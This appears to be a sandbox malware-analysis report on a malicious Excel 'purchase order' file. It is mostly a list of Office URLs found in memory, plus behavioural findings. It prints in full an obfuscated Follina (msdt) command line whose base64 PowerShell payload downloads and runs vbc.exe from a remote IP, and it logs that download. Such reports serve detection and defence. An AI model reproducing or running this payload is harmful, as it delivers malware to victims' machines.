        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://incidents.diagnostics.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://invites.office.com/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://lifecycle.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://login.microsoftonline.com/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://login.windows.local
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://management.azure.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://management.azure.com/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://messaging.action.office.com/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://messaging.lifecycle.office.com/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://messaging.office.com/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://ncus.contentsync.
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://ncus.pagecontentsync.
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://officeapps.live.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://onedrive.live.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://onedrive.live.com/embed?
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://osi.office.net
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://otelrules.azureedge.net
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://outlook.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://outlook.office.com/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://outlook.office365.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://outlook.office365.com/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://pages.store.office.com/review/query
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://powerlift.acompli.net
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://roaming.edog.
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://settings.outlook.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://shell.suite.office.com:1443
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://skyapi.live.net/Activity/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://staging.cortana.ai
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://store.office.cn/addinstemplate
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://store.office.de/addinstemplate
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://tasks.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://web.microsoftstream.com/video/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://webshell.suite.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://wus2.contentsync.
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://wus2.pagecontentsync.
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://www.odwebp.svc.ms
        Source: global trafficHTTP traffic detected: GET /shipping_invc/document.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.119.48Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /870/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.119.48Connection: Keep-Alive

        System Summary

        barindex
        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
        Source: Screenshot number: 4Screenshot OCR: enable Editing and Content from the Yellow bar 18" ~ A above to view locked content. 19" pm 20 2
        Source: DiagPackage.dll.13.drStatic PE information: No import functions for PE file found
        Source: DiagPackage.dll.mui.13.drStatic PE information: No import functions for PE file found
        Source: 0000000D.00000002.511470035.0000000000820000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-20
        Source: 0000000D.00000002.511764004.0000000000828000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-20
        Source: Process Memory Space: msdt.exe PID: 6596, type: MEMORYSTRMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-20
        Source: DiagPackage.dll.13.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagPackage.dll.13.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagPackage.dll.13.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: purchase order.xlsxReversingLabs: Detection: 17%
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
        Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id pcWdiAGNOsTIc -skiP FOrCE /PArAM "It_rEBrowSeforFILe=#AIT IT_LaunchMethod=ContextMenu IT_BrowseForFile=4yt$(IEx($(IEX('[SysTEm.TExt.eNCodIng]'+[CHar]58+[CHAr]58+'UTF8.GeTStRIng([SYstEm.cONveRT]'+[Char]58+[cHAR]58+'FROMBAsE64stRiNg('+[cHaR]34+'U1RvcC1wck9jZVNTIC1Gb3JDZSAtbkFtZSAnbXNkdCc7JFdaID0gYWRkLVR5cEUgLW1FbWJlcmRFZmluSXRJT04gJ1tEbGxJbXBvcnQoInVyTE1vTi5kbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIEtXTCxzdHJpbmcgcEssc3RyaW5nIGp0Ryx1aW50IEV3LEludFB0ciB6YmcpOycgLU5hbWUgIlFXYiIgLU5hTWVTUGFjZSBtcyAtUGFzc1RocnU7ICRXWjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTE5LjQ4Lzg3MC92YmMuZXhlIiwiJGVOdjpQVUJMSUNcdmJjLmV4ZSIsMCwwKTtzdEFyVC1zTGVFUCgzKTtyVW5kbEwzMi5lWEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkRW52OlBVQkxJQ1x2YmMuZXhlIjtTdG9QLVByb2NFU3MgLUZPcmNFIC1uYW1FICdzZGlhZ25ob3N0Jw=='+[cHAr]34+'))'))))ej/../../../../../../../../../../../../.Msi
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\byhngmvt\byhngmvt.cmdline
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF139.tmp" "c:\Users\user\AppData\Local\Temp\byhngmvt\CSC32F0A3FBBAE2450F8C7268C7C3F4F6C.TMP"
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1fyof3jw\1fyof3jw.cmdline
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES13B6.tmp" "c:\Users\user\AppData\Local\Temp\1fyof3jw\CSCCF40F4DDD1534C9CB221F9FD50B8FC59.TMP"
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1cq1zudv\1cq1zudv.cmdline
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id pcWdiAGNOsTIc -skiP FOrCE /PArAM "It_rEBrowSeforFILe=#AIT IT_LaunchMethod=ContextMenu IT_BrowseForFile=4yt$(IEx($(IEX('[SysTEm.TExt.eNCodIng]'+[CHar]58+[CHAr]58+'UTF8.GeTStRIng([SYstEm.cONveRT]'+[Char]58+[cHAR]58+'FROMBAsE64stRiNg('+[cHaR]34+'U1RvcC1wck9jZVNTIC1Gb3JDZSAtbkFtZSAnbXNkdCc7JFdaID0gYWRkLVR5cEUgLW1FbWJlcmRFZmluSXRJT04gJ1tEbGxJbXBvcnQoInVyTE1vTi5kbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIEtXTCxzdHJpbmcgcEssc3RyaW5nIGp0Ryx1aW50IEV3LEludFB0ciB6YmcpOycgLU5hbWUgIlFXYiIgLU5hTWVTUGFjZSBtcyAtUGFzc1RocnU7ICRXWjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTE5LjQ4Lzg3MC92YmMuZXhlIiwiJGVOdjpQVUJMSUNcdmJjLmV4ZSIsMCwwKTtzdEFyVC1zTGVFUCgzKTtyVW5kbEwzMi5lWEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkRW52OlBVQkxJQ1x2YmMuZXhlIjtTdG9QLVByb2NFU3MgLUZPcmNFIC1uYW1FICdzZGlhZ25ob3N0Jw=='+[cHAr]34+'))'))))ej/../../../../../../../../../../../../.Msi Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF139.tmp" "c:\Users\user\AppData\Local\Temp\byhngmvt\CSC32F0A3FBBAE2450F8C7268C7C3F4F6C.TMP"Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES13B6.tmp" "c:\Users\user\AppData\Local\Temp\1fyof3jw\CSCCF40F4DDD1534C9CB221F9FD50B8FC59.TMP"Jump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32Jump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{25D11404-BE86-4B00-8632-AD71AC6E433D} - OProcSessId.datJump to behavior
        Source: classification engineClassification label: mal68.expl.winXLSX@10/24@0/1
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Windows\SysWOW64\MSFTEDIT.DLLJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\byhngmvt\byhngmvt.cmdline
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1fyof3jw\1fyof3jw.cmdline
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1cq1zudv\1cq1zudv.cmdline
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\byhngmvt\byhngmvt.dllJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\1fyof3jw\1fyof3jw.dllJump to dropped file
        Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\en-US\DiagPackage.dll.muiJump to dropped file
        Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\DiagPackage.dllJump to dropped file
        Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\en-US\DiagPackage.dll.muiJump to dropped file
        Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\DiagPackage.dllJump to dropped file
